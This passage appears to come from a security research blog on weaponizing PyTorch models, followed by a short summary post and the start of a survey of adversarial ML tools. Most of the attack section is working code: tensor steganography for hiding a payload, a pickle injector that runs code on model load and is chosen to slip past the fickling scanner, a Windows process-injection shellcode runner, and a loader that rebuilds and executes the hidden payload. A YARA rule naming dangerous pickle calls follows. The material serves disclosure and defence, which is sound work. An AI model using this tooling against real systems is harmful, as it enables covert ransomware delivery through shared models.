                # Embed the payload bits into the float
                f = np.bitwise_and(f, mask)
                f = np.bitwise_or(f, lsb_value)

                # Update the float value in the tensor
                tensor_iterator[0] = f

    return False

parser = argparse.ArgumentParser(description="PyTorch Steganography")
parser.add_argument("model", type=Path)
parser.add_argument("payload", type=Path)
parser.add_argument("--bits", type=int, choices=range(1, 9), default=3)

args = parser.parse_args()

if pytorch_steganography(args.model, args.payload, n=args.bits):
    print("Embedded payload in model successfully")

Listing 1: torch_steganography.py

It’s worth noting that the payload doesn’t have to be written forwards as in the above example, it could be stored backwards, or split across multiple tensors, but we chose to implement it this way to keep the demo code more readable. A nefarious bad actor may decide to use a more convoluted approach, which can seriously hamper steganography analysis and detection.

As a side note, while implementing the steganography code, we got to wondering: could some of the least significant bits of the mantissa simply be nulled out, effectively offering a method for quick and dirty compression? It turns out that they can, and again, with little loss in the efficacy of the target model (depending on the number of bits zeroed). While not pretty, this hacky compression technique may be viable when the trade-off between model size and loss of accuracy is worthwhile and where quantizing is not viable for whatever reason.

Moving on, now that we can embed an arbitrary payload into a tensor, we need to figure out how to reconstruct it and load it automatically. For the next step, it would be helpful if there was a means of executing arbitrary code when loading a model.

Exploiting Serialization

Before a trained ML model is distributed or put in production, it needs to be “serialized,” i.e., translated into a byte stream format that can be used for storage, transmission, and loading. Data serialization is a common procedure that can be applied to all kinds of data structures and objects. Popular generic serialization formats include staples like CSV, JSON, XML, and Google Protobuf. Although some of these can be used for storing ML models, several specialized formats have also been designed specifically with machine learning in mind.

Overview of ML Model Serialization Formats

Most ML libraries have their own preferred serialization methods. The built-in Python module called pickle is one of the most popular choices for Python-based frameworks – hence the model serialization process is often called “pickling.” The default serialization format in PyTorch, TorchScript, is essentially a ZIP archive containing pickle files and tensor BLOBs. The scikit-learn framework also supports pickle, but recommends another format, joblib, for use with large data arrays. Tensorflow has its own protobuf-based SavedModel and TFLite formats, while Keras uses a format called HDF5; Java-based H2O frameworks serialize models to POJO or MOJO formats. There are also framework-independent formats, such as ONNX (Open Neural Network eXchange) and XML-based PMML, which aim to be framework agnostic. Plenty to choose from for a data scientist.

The following table outlines the common model serialization techniques, the frameworks that use them, and whether or not they presently have a means of executing arbitrary code when loading:


Format	Type	Framework	Description	Code execution?
JSON	Text	Interoperable	Widely used data interchange format	No
PMML	XML	Interoperable	Predictive Model Markup Language, one of the oldest standards for storing data related to machine learning models; based on XML	No
pickle	Binary	PyTorch, scikit-learn, Pandas	Built-in Python module for Python objects serialization; can be used in any Python-based framework	Yes
dill	Binary	PyTorch, scikit-learn	Python module that extends pickle with additional functionalities	Yes
joblib	Binary	PyTorch, scikit-learn	Python module, alternative to pickle; optimized to use with objects that carry large numpy arrays	Yes
MsgPack	Binary	Flax	Conceptually similar to JSON, but ‘fast and small’, instead utilizing binary serialization	No
Arrow	Binary	Spark	Language independent data format which supports efficient streaming of data and zero copy reads	No
Numpy	Binary	Python-based frameworks	Widely used Python library for working with data	Yes
TorchScript	Binary	PyTorch	PyTorch implementation of pickle	Yes
H5 / HDF5	Binary	Keras	Hierarchical Data Format, supports large amount of data	Yes
SavedModel	Binary	TensorFlow	TensorFlow-specific implementation based on protobuf	No
TFLite/FlatBuffers	Binary	TensorFlow	TensorFlow-specific for low resource deployment	No
ONNX	Binary	Interoperable	Open Neural Network Exchange format based on protobuf	Yes
SafeTensors	Binary	Python-based frameworks	A new data format from Huggingface designed for the safe and efficient storage of tensors	No
POJO	Binary	H2O	Plain Old JAVA Object	Yes
MOJO	Binary	H2O	Model ObJect, Optimized	Yes

Plenty to choose from for an adversary! Throughout the blog, we will focus on the PyTorch framework and its use of the pickle format, as it’s very popular and yet inherently insecure.

Pickle Internals

Pickle is a built-in Python module that implements serialization and de-serialization mechanisms for Python structures and objects. The objects are serialized (or pickled) into a binary form that resembles a compiled program and loaded (or de-serialized / unpickled) by a simple stack-based virtual machine.

The pickle VM has about 70 opcodes, most of which are related to the manipulation of values on the stack. However, to be able to store classes, pickle also implements opcodes that can load an arbitrary Python module and execute methods. These instructions are intended to invoke the __reduce__ and __reduce_ex__ methods of a Python class which will return all the information necessary to perform class reconstruction. However, lacking any restrictions or security checks, these opcodes can easily be (mis)used to execute any arbitrary Python function with any parameters. This makes the pickle format inherently insecure, as stated by a big red warning in the Python documentation for pickle.

warning table — *Figure 5: Warning on the Python documentation page*

Pickle Code Injection PoC

To weaponize the main pickle file within an existing pre-trained PyTorch model, we have developed the following example code. It injects the model’s data.pkl file with an instruction to execute arbitrary code by using either os.system, exec, eval, or the lesser-known runpy._run_code method:

import os
import argparse
import pickle
import struct
import shutil
from pathlib import Path

import torch

class PickleInject():
    """Pickle injection. Pretends to be a "module" to work with torch."""
    def __init__(self, inj_objs, first=True):
        self.__name__ = "pickle_inject"
        self.inj_objs = inj_objs
        self.first = first

    class _Pickler(pickle._Pickler):
        """Reimplementation of Pickler with support for injection"""
        def __init__(self, file, protocol, inj_objs, first=True):
            super().__init__(file, protocol)

            self.inj_objs = inj_objs
            self.first = first

        def dump(self, obj):
            """Pickle data, inject object before or after"""
            if self.proto >= 2:
                self.write(pickle.PROTO + struct.pack("<B", self.proto))
            if self.proto >= 4:
                self.framer.start_framing()

            # Inject the object(s) before the user-supplied data?
            if self.first:
                # Pickle injected objects
                for inj_obj in self.inj_objs:
                    self.save(inj_obj)

            # Pickle user-supplied data
            self.save(obj)

            # Inject the object(s) after the user-supplied data?
            if not self.first:
                # Pickle injected objects
                for inj_obj in self.inj_objs:
                    self.save(inj_obj)

            self.write(pickle.STOP)
            self.framer.end_framing()

    def Pickler(self, file, protocol):
        # Initialise the pickler interface with the injected object
        return self._Pickler(file, protocol, self.inj_objs)

    class _PickleInject():
        """Base class for pickling injected commands"""
        def __init__(self, args, command=None):
            self.command = command
            self.args = args

        def __reduce__(self):
            return self.command, (self.args,)

    class System(_PickleInject):
        """Create os.system command"""
        def __init__(self, args):
            super().__init__(args, command=os.system)

    class Exec(_PickleInject):
        """Create exec command"""
        def __init__(self, args):
            super().__init__(args, command=exec)

    class Eval(_PickleInject):
        """Create eval command"""
        def __init__(self, args):
            super().__init__(args, command=eval)

    class RunPy(_PickleInject):
        """Create runpy command"""
        def __init__(self, args):
            import runpy
            super().__init__(args, command=runpy._run_code)

        def __reduce__(self):
            return self.command, (self.args,{})

parser = argparse.ArgumentParser(description="PyTorch Pickle Inject")
parser.add_argument("model", type=Path)
parser.add_argument("command", choices=["system", "exec", "eval", "runpy"])
parser.add_argument("args")
parser.add_argument("-v", "--verbose", help="verbose logging", action="count")

args = parser.parse_args()

command_args = args.args

# If the command arg is a path, read the file contents
if os.path.isfile(command_args):
    with open(command_args, "r") as in_file:
        command_args = in_file.read()

# Construct payload
if args.command == "system":
    payload = PickleInject.System(command_args)
elif args.command == "exec":
    payload = PickleInject.Exec(command_args)
elif args.command == "eval":
    payload = PickleInject.Eval(command_args)
elif args.command == "runpy":
    payload = PickleInject.RunPy(command_args)

# Backup the model
backup_path = "{}.bak".format(args.model)
shutil.copyfile(args.model, backup_path)

# Save the model with the injected payload
torch.save(torch.load(args.model), f=args.model, pickle_module=PickleInject([payload]))

Listing 2: torch_picke_inject.py

Invoking the above script with the exec injection command, along with the command argument print(‘hello’), will result in a PyTorch model that will execute the print statement via the __reduce__ class method when loaded:

> python torch_picke_inject.py resnet18-f37072fd.pth exec print('hello')
> python
>>> import torch
>>> torch.load("resnet18-f37072fd.pth")
hello
OrderedDict([('conv1.weight', Parameter containing:

However, we have a slight problem. There is a very similar (and arguably much better) tool for injecting into pickle files – GitHub – trailofbits/fickling: A Python pickling decompiler and static analyzer – which also provides detection for malicious pickles.

Scanning a benign pickle file using fickling yields the following output:

> fickling --check-safety safe.pkl
Warning: Fickling failed to detect any overtly unsafe code, but the pickle file may still be unsafe.
Do not unpickle this file if it is from an untrusted source!

If we scan an unmodified data.pkl from a PyTorch model Zip file, we notice a handful of warnings by default:

> fickling --check-safety data.pkl
…
Call to `_rebuild_tensor_v2(...)` can execute arbitrary code and is inherently unsafe
Call to `_rebuild_parameter(...)` can execute arbitrary code and is inherently unsafe
Call to `_var329.update(...)` can execute arbitrary code and is inherently unsafe

This is however quite normal, as PyTorch uses the above functions to reconstruct tensors when loading a model.

But if we then scan the data.pkl file containing the injected exec command made by torch_picke_inject.py, we now get an additional alert:

> fickling --check-safety data.pkl
…
Call to `_rebuild_tensor_v2(...)` can execute arbitrary code and is inherently unsafe
Call to `_rebuild_parameter(...)` can execute arbitrary code and is inherently unsafe
Call to `_var329.update(...)` can execute arbitrary code and is inherently unsafe
Call to `exec(...)` is almost certainly evidence of a malicious pickle file

Fickling also detects injected system and eval commands, which doesn’t quite fulfill our brief of producing an attack that is “currently undetected”. This problem led us to hunt the standard Python libraries for yet another means of executing code. With the happy discovery of runpy — Locating and executing Python modules, we were back in business! Now we can inject code into the pickle using:

> python torch_picke_inject.py resnet18-f37072fd.pth runpy print('hello')

The runpy._run_code approach is currently undetected by fickling (although we have reported the issue prior to publishing the blog). After a final scan, we can verify that we only see the usual warnings for a benign PyTorch data pickle:

> fickling --check-safety data.pkl
…
Call to `_rebuild_tensor_v2(...)` can execute arbitrary code and is inherently unsafe
Call to `_rebuild_parameter(...)` can execute arbitrary code and is inherently unsafe
Call to `_var329.update(...)` can execute arbitrary code and is inherently unsafe

Finally, it is worth mentioning that HuggingFace have also implemented scanning for malicious pickle files in models uploaded by users, and recently published a great blog on Pickle Scanning that is well worth a read.

Attacker’s Perspective

At this point, we can embed a payload in the weights and biases of a tensor, and we also know how to execute arbitrary code when a PyTorch model is loaded. Let’s see how we can use this knowledge to deploy malware to our test machine.

To make the attack invisible to most conventional security solutions, we decided that we wanted our final payload to be loaded into memory reflectively, instead of writing it to disk and loading it, where it could easily be detected. We wrapped up the payload binary in a reflective PE loader shellcode and embedded it in a simple Python script that performs memory injection (payload.py). This script is quite straightforward: it uses Windows APIs to allocate virtual memory inside the python.exe process running PyTorch, copies the payload to the allocated memory, and finally executes the payload in a new thread. This is all greatly simplified by the Python ctypes module, which allows for calling arbitrary DLL exports, such as the kernel32.dll functions required for the attack:

import os, sys, time
import binascii
from ctypes import *
import ctypes.wintypes as wintypes

shellcode_hex = "DEADBEEF" // Place your shellcode-wrapped payload binary here!
shellcode = binascii.unhexlify(shellcode_hex)

pid = os.getpid()

handle = windll.kernel32.OpenProcess(0x1F0FFF, False, pid)
if not handle:
    print("Can't get process handle.")
    sys.exit(0)

shellcode_len = len(shellcode)

windll.kernel32.VirtualAllocEx.restype = wintypes.LPVOID
mem = windll.kernel32.VirtualAllocEx(handle, 0, shellcode_len, 0x1000, 0x40)
if not mem:
    print("VirtualAlloc failed.")
    sys.exit(0)

windll.kernel32.WriteProcessMemory.argtypes = [c_int, wintypes.LPVOID, wintypes.LPVOID, c_int, c_int]
windll.kernel32.WriteProcessMemory(handle, mem, shellcode, shellcode_len, 0)

windll.kernel32.CreateRemoteThread.argtypes = [c_int, c_int, c_int, wintypes.LPVOID, c_int, c_int, c_int]
tid = windll.kernel32.CreateRemoteThread(handle, 0, 0, mem, 0, 0, 0)
if not tid:
    print("Failed to create remote thread.")
    sys.exit(0)    

windll.kernel32.WaitForSingleObject(tid, -1)
time.sleep(10)

Listing 3: payload.py

Since there are many open-source implementations of DLL injection shellcode, we shall leave that part of the exercise up to the reader. Suffice it to say, the choice of final stage payload is fairly limitless and could quite easily target other operating systems, such as Linux or Mac. The only restriction is that the shellcode must be 64-bit compatible, as several popular ML libraries, such as PyTorch and TensorFlow, do not operate on 32-bit systems.

Once the payload.py script is encoded into the tensors using the previously described torch_steganography.py, we then need a way to reconstruct and execute it automatically whenever the model is loaded. The following script (torch_stego_loader.py) is executed via the malicious data.pkl when the model is unpickled via torch.load, and operates by using Python’s sys.settrace method to trace execution for calls to PyTorch’s _rebuild_tensor_v2 function (remember we saw fickling detect this function earlier?). The return value from the _rebuild_tensor_v2 function is a rebuilt tensor, which is intercepted by the execution tracer. For each intercepted tensor, the stego_decode function will attempt to reconstruct any embedded payload and verify the SHA256 checksum. If the checksum matches, the payload will be executed (and the execution tracer removed):

import sys
import sys
import torch

def stego_decode(tensor, n=3):
    import struct
    import hashlib
    import numpy

    assert 1 <= n <= 9

    # Extract n least significant bits from the low byte of each float in the tensor
    bits = numpy.unpackbits(tensor.view(dtype=numpy.uint8))
    
    # Reassemble the bit stream to bytes
    payload = numpy.packbits(numpy.concatenate([numpy.vstack(tuple([bits[i::tensor.dtype.itemsize * 8] for i in range(8-n, 8)])).ravel("F")])).tobytes()

    try:
        # Parse the size and SHA256
        (size, checksum) = struct.unpack("i 64s", payload[:68])

        # Ensure the message size is somewhat sane
        if size < 0 or size > (numpy.prod(tensor.shape) * n) / 8:
            return None
    except struct.error:
        return None

    # Extract the message
    message = payload[68:68+size]

    # Ensure the original and decoded message checksums match
    if not bytes(hashlib.sha256(message).hexdigest(), "utf-8") == checksum:
        return None

    return message

def call_and_return_tracer(frame, event, arg):
    global return_tracer
    global stego_decode
    def return_tracer(frame, event, arg):
        # Ensure we've got a tensor
        if torch.is_tensor(arg):
            # Attempt to parse the payload from the tensor
            payload = stego_decode(arg.data.numpy(), n=3)
            if payload is not None:
                # Remove the trace handler
                sys.settrace(None)
                # Execute the payload
                exec(payload.decode("utf-8"))

    # Trace return code from _rebuild_tensor_v2
    if event == "call" and frame.f_code.co_name == "_rebuild_tensor_v2":
        frame.f_trace_lines = False
        return return_tracer

sys.settrace(call_and_return_tracer)

Listing 4: torch_stego_loader.py

Note that in the above code, where the stego_decode function is called, the number of bits used to encode the payload must be set accordingly (for example, n=8 if 8-bits were used to embed the payload).

At this point, a quick recap is certainly in order. We now have four scripts that can be used to perform the steganography, pickle injection, reconstruction, and loading of a payload:


Script	Description
torch_steganography.py	Embed an arbitrary payload into the weights/biases of a model using n bits.
torch_picke_inject.py	Inject arbitrary code into a pickle file that is executed upon load.
torch_stego_loader.py	Reconstruct and execute a steganography payload. This script is injected into PyTorch’s data.pkl file and executed when loading. Don’t forget to set the bit count for stego_decode (n=3)!
payload.py	Execute the final stage shellcode payload. This file is embedded using steganography and executed via torch_stego_loader.py after reconstruction.

Using the above scripts, weaponizing a model is now as simple as:

> python torch_steganography.py –bits 3 resnet18-f37072fd.pth payload.py
> python torch_picke_inject.py resnet18-f37072fd.pth runpy torch_stego_loader.py

When the ResNet model is subsequently loaded via torch.load, the embedded payload will be automatically reconstructed and executed.

We’ve prepared a short video to demonstrate how our hijacked pre-trained ResNet model stealthily executed a ransomware sample the moment it was loaded into memory by PyTorch on our test machine. For the purpose of this demo, we’ve chosen to use an x64 Quantum ransomware sample. Quantum was first discovered in August 2021 and is currently making rounds in the wild, famous for being very fast and quite lightweight. These characteristics play well for the demo, but the model injection technique would work with any other ransomware family – or indeed any malware, such as backdoors, CobaltStrike Beacon or Metasploit payloads.

Hidden Ransomware Executed from an ML Model

Detecting Model Hijacking Attacks

Detecting model hijacking can be challenging. We have had limited success using techniques such as entropy and Z-scores to detect payloads embedded via steganography, but typically only with low-entropy Python scripts. As soon as payloads are encrypted, the entropy of the lower order bits of tensor floats changes very little compared to normal (as it remains high), and detection often fails. The best approach is to scan for code execution via the various model file formats. Alongside fickling, and in the interest of providing yet another detection mechanism for potentially malicious pickle files, we offer the following “MaliciousPickle” YARA rule:

private rule PythonStdLib{
 
 meta:
   author = "Eoin Wickens - Eoin@HiddenLayer.com"
   description = "Detects python standard module imports"
   date = "16/09/22"
 
 strings:
   // Command Libraries - These prefix the command itself and indicate what library to use
   $os = "os"
   $runpy = "runpy"
   $builtins = "builtins"
   $ccommands = "ccommands"
   $subprocess = "subprocess"
   $c_builtin = "c__builtin__\n"
 
 
   // Commands - The commands that follow the prefix/library statement
 
   // OS Commands
   $os_execvp = "execvp"
   $os_popen = "popen"
 
   // Subprocess Commands
   $sub_call = "call"
   $sub_popen = "Popen"
   $sub_check_call = "check_call"
   $sub_run = "run"
 
   // Builtin Commands
   $cmd_eval = "eval"
   $cmd_exec = "exec"
   $cmd_compile = "compile"
   $cmd_open = "open"
 
   // Runpy command, the darling boy
   $run_code = "run_code"
 
 condition:
     // Ensure command precursor then check for one of its commands within n number of bytes after the first index of the command precursor
     ($c_builtin or $builtins or $os or $ccommands or $subprocess or $runpy) and
 
     (
     any of ($cmd_*) in (@c_builtin..@c_builtin+20) or
     any of ($cmd_*) in (@builtins..@builtins+20) or
     any of ($os_*) in (@os..@os+10) or
     any of ($sub_*) in (@ccommands..@ccommands+20) or
     any of ($sub_*) in (@subprocess..@subprocess+20) or
     any of ($run_*) in (@runpy..@runpy+20)
     )
}
 
private rule PythonNonStdLib {
 
   meta:
     author = "Eoin Wickens - Eoin@HiddenLayer.com"
     description = "Detects python libs not in the std lib"
     date = "16/09/22"
 
   strings:
 
     $py_import = "import" nocase
     $import_requests = "requests" nocase
 
     $non_std_lib_pip = "pip install"
 
     $non_std_lib_posix_system = /posix[^_]{1,4}system/ // posix system with up to 4 arbitrary bytes in between, for posterity
     $non_std_lib_nt_system = /nt[^_]{1,4}system/ // nt system with 4 arbitrary bytes in between, for posterity
 
   condition:
     any of ($non_std_lib_*) or
     ($py_import and any of ($import_*) in (@py_import..@py_import+100))
}
 
 
private rule PickleFile {
 
 meta:
   author = "Eoin Wickens - Eoin@HiddenLayer.com"
   description = "Detects Pickle files"
   date = "16/09/22"
 
 strings:
   $header_cos = "cos"
   $header_runpy = "runpy"
   $header_builtins = "builtins"
   $header_ccommands = "ccommands"
   $header_subprocess = "subprocess"
   $header_cposix = "cposix\nsystem"
   $header_c_builtin = "c__builtin__"
 
 condition:
 
     (
       uint8(0) == 0x80 or // Pickle protocol opcode
       for any of them: ($ at 0) or $header_runpy at 1 or $header_subprocess at 1
     )
 
     // Last byte has to be 2E to conform to Pickle standard
     and uint8(filesize-1) == 0x2E
}
 
private rule Pickle_LegacyPyTorch {
 
 meta:
   author = "Eoin Wickens - Eoin@HiddenLayer.com"
   description = "Detects Legacy PyTorch Pickle files"
   date = "16/09/22"
 
 strings:
   $pytorch_legacy_magic_big = {19 50 a8 6a 20 f9 46 9c fc 6c}
   $pytorch_legacy_magic_little = {50 19 6a a8 f9 20 9c 46 6c fc}
 
 condition:
   // First byte is either 80 - Indicative of Pickle PROTOCOL Opcode
   // Also must contain the legacy pytorch magic in either big or little endian
   uint8(0) == 0x80 and ($pytorch_legacy_magic_little or $pytorch_legacy_magic_big in (0..20))
}
 
rule MaliciousPickle {
 
 meta:
   author = "Eoin Wickens - Eoin@HiddenLayer.com"
   description = "Detects Pickle files with dangerous c_builtins or non standard module imports. These are typically indicators of malicious intent"
   date = "16/09/22"
  
 condition:
 // Any of the commands or any of the non std lib definitions
  (PickleFile or Pickle_LegacyPyTorch) and (PythonStdLib or PythonNonStdLib)

Listing 5: Pickle.yara

Conclusion

As we’ve alluded to throughout, the attack techniques demonstrated in this blog are not just confined to PyTorch and pickle files. The steganography process is fairly generic and can be applied to the floats in tensors from most ML libraries. Also, steganography isn’t only limited to embedding malicious code. It could quite easily be employed to exfiltrate data from an organization.

Automatic code execution is a little more tricky to achieve. However, a wonderful tool called Charcuterie, by Will Pearce/moohax, provides support for facilitating code execution via many popular ML libraries, and even Jupyter notebooks.

The attack demonstrated in this blog can also be made operating system agnostic, with OS and architecture-specific payloads embedded in different tensors and loaded dynamically at runtime, depending on the platform.

All the code samples in this blog have been kept relatively simple for the sake of readability. In practice, we expect bad actors employing these techniques to take far greater care in how payloads are obfuscated, packaged, and deployed, to further confound reverse engineering efforts and anti-malware scanning solutions.

As far as practical, actionable advice on how best to mitigate against the threats described, it is highly recommended that if you load pre-trained models downloaded from the internet, you do so in a secure sandboxed environment. The risks posed by adversarial AI techniques, including AI data poisoning attacks, highlight the importance of rigorous validation of training data and models to prevent malicious actors from embedding harmful payloads or manipulating model behavior. The potential for models to be subverted is quite high, and presently anti-malware solutions are not doing a fantastic job of detecting all of the code execution techniques. EDR solutions may offer better insight into attacks as and when they occur, but even these solutions will require some tuning and testing to spot some of the more advanced payloads we can deploy via ML models.

And finally, if you are a producer of machine learning models, however, they may be deployed, consider which storage formats offer the most security (i.e., are free from data deserialization flaws), and also consider model signing as a means of performing integrity checking to spot tampering and corruption. It is always worthwhile ensuring the models you deploy are free from malicious meddling, to avoid being at the forefront of the next major supply chain attack.

Once again, just to reiterate; For peace of mind, don’t load untrusted models on your corporate laptop!

Research

min read

Machine Learning is the New Launchpad for Ransomware

AI models can be weaponized with hidden ransomware, exploiting insecure serialization to bypass traditional security.

Researchers at HiddenLayer’s SAI Team have developed a proof-of-concept attack for surreptitiously deploying malware, such as ransomware or Cobalt Strike Beacon, via machine learning models. The attack uses a technique currently undetected by many cybersecurity vendors and can serve as a launchpad for lateral movement, deployment of additional malware, or the theft of highly sensitive data. Read more in our latest blog, Weaponizing Machine Learning Models with Ransomware.

Attack Surface

According to CompTIA, over 86% of surveyed CEOs reported that machine learning was a mainstream technology within their companies as of 2021. Open-source model-sharing repositories have been born out of inherent data science complexity, practitioner shortage, and the limitless potential and value they provide to organizations – dramatically reducing the time and effort required for ML/AI adoption. However, such repositories often lack comprehensive security controls, which ultimately passes the risk on to the end user - and attackers are counting on it. It is commonplace within data science to download and repurpose pre-trained machine learning models from online model repositories such as HuggingFace or TensorFlow Hub, amongst many others of a far less reputable and security conscientious nature. The general scarcity of security around ML models, coupled with the increasingly sensitive data that ML models are exposed to, means that model hijacking attacks, including AI data poisoning, can evade traditional security solutions and have a high propensity for damage.

Business Implication

The implications of loading a hijacked model can be severe, especially given the sensitive data an ML model is often privy to, specifically:

Initial compromise of an environment and lateral movement
Deployment of malware (such as ransomware, spyware, backdoors, etc.)
Supply chain attacks
Theft of Intellectual Property
Leaking of Personally Identifiable Information
Denial/Degradation of service
Reputational harm

How Does This Attack Work?

By combining several attack techniques, including steganography for hiding malicious payloads and data de-serialization flaws that can be leveraged to execute arbitrary code, our researchers demonstrate how to attack a popular computer vision model and embed malware within. The resulting weaponized model evades current detection from anti-virus and EDR solutions while suffering only a very insignificant loss in efficacy. Currently, most popular anti-malware solutions provide little or no support in scanning for ML-based threats.

The researchers focused on the PyTorch framework and considered how the attack could be broadened to target other popular ML libraries, such as TensorFlow, scikit-learn, and Keras. In the demonstration, a 64-bit sample of the infamous Quantum ransomware is deployed on a Windows 10 system. However, any bespoke payload can be distributed in this way and tailored to target different operating systems, such as Windows, Linux, and Mac, and other architectures, such as x86/64.;

Hidden Ransomware Executed from an ML Model

Mitigations & Recommendations

Proactive Threat Discovery: Don’t wait until it’s too late. Pre-trained models should be investigated ahead of deployment for evidence of tampering, hijacking, or abuse. HiddenLayer provides a Model Scanning service that can help with identifying malicious tampering. In this blog, we also share a specialized YARA rule for finding evidence of executable code stored within models serialized to the pickle format (a common machine learning file type).
Securely Evaluate Model Behaviour: At the end of the day, models are software: if you don’t know where it came from, don’t run it within your enterprise environment. Untrusted pre-trained models should be carefully inspected inside a secure virtual machine prior to being considered for deployment.;
Cryptographic Hashing & Model Signing: Not just for integrity, cryptographic hashing provides verification that your models have not been tampered with. If you want to take this a step further, signing your models with certificates ensures a particular level of trust which can be verified by users downstream.
External Security Assessment: Understand your level of risk, address blindspots and see what you could improve upon. With the level of sensitive data that ML models are privy to, an external security assessment of your ML pipeline may be worth your time. HiddenLayer’s SAI Team and Professional Services can help your organization evaluate the risk and security of your AI assets

About HiddenLayer

HiddenLayer helps enterprises safeguard the machine learning models behind their most important products with a comprehensive security platform. Only HiddenLayer offers turnkey AI/ML security that does not add unnecessary complexity to models and does not require access to raw data and algorithms. Founded in March of 2022 by experienced security and ML professionals, HiddenLayer is based in Austin, Texas, and is backed by cybersecurity investment specialist firm Ten Eleven Ventures. For more information, visit www.hiddenlayer.com and follow us on LinkedIn or Twitter.

Research

min read

Unpacking the AI Adversarial Toolkit

The Rise of Autonomy: Tools have evolved from static libraries to Autonomous Pentesting Agents (e.g., Penligent, XBOW) that use "Chain-of-Thought" reasoning to execute end-to-end attack chains without human intervention.

Unpacking the Adversarial Toolkit

More often than not, it’s the creation of a new class of tool, or weapon, that acts as the catalyst of change and herald of a new age. Be it the sword, gun, first piece of computer malware, or offensive security frameworks like Metasploit, they all changed the paradigm and required us to adapt to face our new reality or ignore it at our peril.

Much in the same way, the field of adversarial machine learning is beginning to find its inflection points, with scores of tools and frameworks being released into the public sphere that bring the more advanced methods of attack into the hands of the many. These tools are often used with defensive evaluation in mind, but how they are used often depends on the hands of those who wield them.

The question remains, what are these tools, and how are they being used? The first step in defending yourself is knowing what’s out there.

Let’s begin!

Offensive Security Frameworks

Ask a security practitioner if they know of any offensive security frameworks, and the answer will almost always be a resounding ‘yes.’ The concept has been around for a long time, but frameworks such as Metasploit, Cobalt Strike, and Empire popularized the idea to an entirely new level. At their core, these frameworks amalgamate a set of often-complex attacks for various parts of a kill chain in one place (or one tool), enabling an adversary to perform attacks with ease, while only requiring an abstract understanding of how the attack works under the hood.

While they’re often referred to as ‘offensive’ security frameworks or ‘attack’ frameworks, they can also be used for defensive purposes. Security teams and penetration testers use such frameworks to evaluate security posture with greater ease and reproducibility. But, on the other side of the same coin, they also help to facilitate attackers in conducting malicious attacks. This concept holds true with adversarial machine learning. Currently, adversarial ML attacks have not yet become as commonplace as attacks on systems that support them but, with greater access to tooling, there is no doubt we will see them rise.

Here are some adversarial ML frameworks we’re acquainted with.

Adversarial Robustness Toolbox – IBM / LFAI

GitHub – Website

In 2018, IBM released the Adversarial Robustness Toolbox, or ART, for short. ART is a framework/library used to evaluate the security of machine learning models through various means and is now part of the Linux Foundation since early 2020. Models can be created, attacked, and evaluated all in one tool. ART boasts a multitude of attacks, defences, and metrics that can help security practitioners shore up model defenses and aid offensive researchers in finding vulnerabilities. ART supports all input data types and even includes tutorial examples in the form of Jupyter notebooks for getting started attacking image models, fooling audio classifiers, and much more.

Counterfit – Microsoft

GitHub

Counterfit, released by Microsoft in May of 2021, is a command-line automation tool used to orchestrate attacks and testing against ML models. Counterfit is environment-agnostic, model-agnostic and supports most general types of input data (text, audio, image, etc.). It does not provide the attacks themselves and instead interfaces with existing attacks and frameworks such as Adversarial Robustness Toolbox, TextAttack, and Augly. Users of Counterfit will no doubt pick up on its uncanny resemblance to Metasploit in terms of its commands and navigation.

Cleverhans – CleverhansLab

GitHub – Website

CleverHans, created by CleverHans-Lab – an academic research group attached to the University of Toronto – is a library that supports the creation of adversarial attacks and defenses and the benchmarking thereof. Carefully maintained tutorial examples are present within the GitHub repository to help users get started with the library. Attacks such as CarliniWagner and HopSkipJump, amongst others, can be used, with varying implementations for the different supported ML libraries – Jax, PyTorch, and TensorFlow 2. For seamless deployment, the tool can be spun up within a Docker container, à la its bundled Dockerfile. CleverHans-Lab regularly publishes research on adversarial attacks on their blog, with associated proof-of-concept (POC) code available from their GitHub profile.

Armory – TwoSixLabs

GitHub

Armory, developed by TwoSixLabs, is an open-source containerized testbed for evaluating adversarial defenses. Armory can be deployed via container either locally or in cloud instances, which enables scalable model evaluation. Armory interfaces with the Adversarial Robustness Toolbox to enable interchangeable attacks and defenses. Armory’s ‘scenarios’ are worth mentioning, allowing for testing and evaluating entire machine learning threat models. When building an Armory scenario, considerations such as adversaries’ objective, operating environment, capabilities, and resources are used to profile an attacker, determine the threat they pose and evaluate the performance impact through metrics of interest. While this is from a higher, more interpretable level, scenarios have a paired config file that contains detailed information on the attack to be performed, the dataset to use, the defense to test, and various other properties. Using these lends itself to a high standard of repeatability and potential for automation.

Foolbox – Jonas Rauber, Roland S. Zimmermann

GitHub – Website

Foolbox is built to perform fast attacks on ML models, having been rewritten to use EagerPy, which allows for native execution with multiple frameworks such as PyTorch, TensorFlow, JAX, and NumPy, without having to make any code changes. Foolbox boasts many gradient- and decision-based attacks, respectively, covering many routes of attack.

TextAttack – QData

GitHub

TextAttack is a powerful model-agnostic NLP attack framework that can perform adversarial text attacks, text augmentation, and model training. While many offensive scenarios can be conducted from within the framework, TextAttack also enables the user to use the framework and related libraries as the basis for the development of custom adversarial attacks. TextAttack’s powerful text augmentation capabilities can also be used to generate data to help increase model generalization and robustness.

MLSploit – Georgia Tech & Intel

GitHub – Website

MLSploit is an extensible cloud-based framework built to enable rapid security evaluation of ML models. Under the hood, MLSploit uses libraries such as Barnum, AVPass, and Shapshifter to create attacks on various malware classifiers, intrusion detectors, and object detectors and identify control flow anomalies in documents, to name a few. However, MLSploit does not appear to have been as actively developed as other frameworks mentioned in this blog.

AugLy – FacebookResearch

GitHub

AugLy, developed by Meta Research (Formerly Facebook Research), is not quite an offensive security framework but deals more specifically with data augmentation. AugLy can augment audio, image, text, and video to generate examples to increase model robustness and generalization. Counterfit uses AugLy for testing for ‘common corruptions,’ which they define as a bug class.

Fault Injection

As the name suggests, fault injection is the act of injecting faults into a system to understand how it behaves when it performs in unusual scenarios. In the case of ML, fault injection typically refers to the manipulation of weights and biases in a model during runtime. Fault Injection can be performed for several reasons, but predominantly to evaluate how models respond to software and hardware faults.

PyTorchFi

GitHub – Paper

PyTorchFi is a fault injection tool for Deep Neural Networks (DNNs) that were trained using PyTorch. PyTorchFi is highly versatile and straightforward to use, supporting several use cases for reliability and dependability research, including:

Resiliency analysis of classification or object detection networks
Analysis of robustness to adversarial attacks
Training resilient models
DNN interpretability

TensorFi – DependableSystemsLab

GitHub – Paper

TensorFI is a fault injection tool to provide runtime perturbations to models trained using TensorFlow. It operates by hooking TensorFlow operators such as LRN, softmax, div, and sub for specific layers and provides methods for altering results via YAML configuration. TorchFI supports a few existing DNNs, such as AlexNet, VGG, and LeNet.

Reinforcement-Learning/GAN-based Attack Tools

